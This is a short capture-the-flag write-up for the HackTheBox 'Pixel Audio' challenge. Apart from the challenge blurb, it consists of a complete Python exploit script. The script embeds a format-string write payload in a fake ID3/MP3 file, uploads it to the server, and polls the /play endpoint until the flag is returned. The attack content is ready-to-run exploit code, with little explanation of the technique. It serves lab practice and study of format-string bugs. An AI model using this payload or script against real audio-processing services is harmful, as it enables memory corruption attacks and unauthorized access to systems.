HackTheBox Pixel Audio Challenge
https://app.hackthebox.com/challenges/594
Description
Welcome to “Pixel Audio” – your ultimate destination for musical bliss! Embark on a journey of sonic delight as you immerse yourself in the tunes that resonate with your soul. Take a break from the hustle and bustle of life and unwind in our vibrant virtual realm. Whether you’re seeking energetic beats to uplift your spirits or soothing melodies to calm your mind, “Pixel Audio” has you covered. Step into our world, where every note is a pixel of joy, and every rhythm paints a picture of serenity. Join us at “Pixel Audio” and let the music carry you away on a euphoric adventure!
Exploitation
#!/usr/bin/python3
import requests,time,sys,os
def get_base_url():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <ip:port>")
sys.exit(1)
host, port = sys.argv[1].split(':')
return f"http://{host}:{port}"
def upload_file(url, file_path):
""" Uploads a file to the server. """
with open(file_path, 'rb') as file:
files = {'file': ('test.mp3', file, 'audio/mp3')}
response = requests.post(url, files=files)
return response.status_code
def check_for_flag(url):
""" Requests the /play endpoint to retrieve and display the flag. """
while True:
response = requests.get(url)
if 'HTB' in response.text:
print("Flag found:", response.text.strip())
break
else:
print("No flag yet, retrying...")
time.sleep(1)
def main():
base_url = get_base_url()
payload = 'ID3%48879c%12$n%495c%13$n'
file_path = '/tmp/test.mp3'
with open(file_path, 'wb') as f:
f.write(payload.encode('utf-8'))
print("Payload written to", file_path)
upload_url = f'{base_url}/upload'
play_url = f'{base_url}/play'
print("Uploading payload...")
if upload_file(upload_url, file_path) == 200:
print("Payload uploaded successfully.")
check_for_flag(play_url)
else:
print("Failed to upload payload.")
if __name__ == '__main__':
main()
Summary
Pixel Audio: build the exploit primitive, stabilize the payload, and use it to read the flag.